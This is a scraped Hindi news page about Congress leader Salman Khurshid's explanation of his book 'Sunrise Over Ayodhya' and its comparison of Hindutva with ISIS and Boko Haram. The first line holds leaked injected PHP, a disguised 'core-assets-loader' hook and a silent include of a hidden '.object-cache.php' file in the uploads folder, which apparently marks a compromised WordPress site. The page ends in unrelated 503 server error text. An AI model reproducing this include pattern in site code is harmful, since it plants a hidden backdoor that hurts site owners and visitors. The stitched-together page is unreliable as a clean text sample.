add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); किताब विवाद पर सलमान खुर्शीद की सफाई, कहा- हिंदुत्व को कभी आतंकी संगठन नहीं कहा – SOCH INDIA
Menu

किताब विवाद पर सलमान खुर्शीद की सफाई, कहा- हिंदुत्व को कभी आतंकी संगठन नहीं कहा

कांग्रेस नेता और पूर्व विदेश मंत्री सलमान खुर्शीद (Salman Khurshid) एक बार फिर विवादों में हैं. विवाद सलमान खुर्शीद की किताब ‘सनराइज ओवर अयोध्या’ को लेकर है. सलमान खर्शीद ने अपनी किताब में हिंदुत्व की तुलना आतंकी संगठन ISIS और बोको हराम से की है और हिंदुत्व की राजनीति को खतरनाक बताया है. अब सलमान खर्शीद ने एबीपी न्यूज़ से खास बातचीत में इस पूरे विवाद पर पर सफाई दी है. सलमान खुर्शीद ने कहा कि मैंने हिंदुत्व को कभी आतंकी संगठन नहीं कहा. मैंने इस किताब को लिखने के लिए सुप्रीम कोर्ट के आदेश का इंतजार किया.

मेरी किताब में आतंकी शब्द ही नहीं है- खुर्शीद

सलमान खुर्शीद ने कहा, ‘’मैंने किसाब में लिखा कि जो लोग हिंदू धर्म का दुरुपयोग करते हैं, वह आईएसआईएस और बोको हरम का समर्थन करते हैं. मेरी किताब में आतंकी शब्द ही नहीं है.’’ उन्होंने कहा, ‘’मैं किताब में लोगों को जोड़ना चाहता हूं. मेरी किताब में महात्मा गांधी का जिक्र है. राम का जिक्र है. बल्कि पूरी रामायण है. लेकिन हिंदू धर्म को मानने वाले लोग इसकी चर्चा भी नहीं कर रहे.’’

राहुल गांधी के बयान पर क्या कहा?

सलमान खुर्शीद ने कहा, ”मैं और मेरी पार्टी एक है. जो मेरी पार्टी चाहती है, करती है, कहती है, उससे मैं पूरी तरह सहमत हूं. मैं पार्टी से अलग नहीं हो सकता और ना ही पार्टी से अलग कोई बात कह सकता हूं. मैंने किताब में कोशिश की है कि जो मेरी पार्टी कहती है और सोचती है, उसी का मैं यहां उल्लेख करूं.” उन्होंने कहा, ”अगर कांग्रेस कहेगी ये ना कहो तो मैं नहीं कहूंगा, लेकिन पार्टी ने तो इसका समर्थन किया है. राहुल गांधी ने कहा है कि अगर हिंदू और हिंदुत्व अलग-अलग नहीं है तो फिर इनके दो नाम क्यों हैं. मैंने अपनी किताब में हिंदुत्व की तारीफ है कि इसे बढ़ाना चाहिए और स्वीकार करना चाहिए. अगर राहुल गांधी ने हिंदू धर्म का अपमान किया है तो वह उनका भी अपमान है, क्योंकि वह खुद हिंदू है.”

गुलाब नबी आजाद के बयान पर क्या कहा?

गुलाब नबी आजाद के बयान पर कांग्रेस नेता खुर्शीद ने आगे कहा, ”आजाद जी जब स्टेटमेंट जारी करते थे तो G-23 हुआ करता था. आज G-1 है. इसका मतलब वह अकेले पड़ गए. बाकी लोग कहां गए? वह मेरे साथी और मेरे सीनियर नेता हैं. उन्होंने जो कहा मैं उसका सम्मान करता हूं.”आजाद ने कहा था, ”हिंदुत्व की जिहादी इस्लाम से तुलना करना गलत है. हम भले ही एक राजनीतिक विचारधारा के तौर पर हिंदुत्व से सहमत न हों लेकिन उसे आईएसआईएस और जिहादी इस्लाम से जोड़ना गलत है.”

किताब में सलमान खुर्शीद ने क्या लिखा?

किताब में हिंदुत्व की तुलना आईएसआईएस और बोको हरम जैसे आतंकी संगठनों से करते हुए सलमान खुर्शीद ने कहा कि हिंदुत्व साधु-सन्तों के सनातन और प्राचीन हिंदू धर्म को किनारे लगा रहा है, जो कि हर तरीके से आईएसआईएस और बोको हरम जैसे जिहादी इस्लामी संगठनों जैसा है. इसकी वजह पूछे जाने पर सलमान ने कहा, “हिन्दू धर्म बहुत उच्च स्तर का धर्म है. इसके लिए गांधी जी ने जो प्रेरणा दी उससे से बढ़कर कोई प्रेरणा नहीं हो सकती है. कोई नया लेबल लगा ले तो उसे मैं क्यों मानूं? कोई हिन्दू धर्म का अपमान करे तो भी मैं बोलूंगा. मैंने ये कहा कि हिंदुत्व की राजनीति करने वाले गलत हैं और आईएसआईएस भी गलत है.”

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.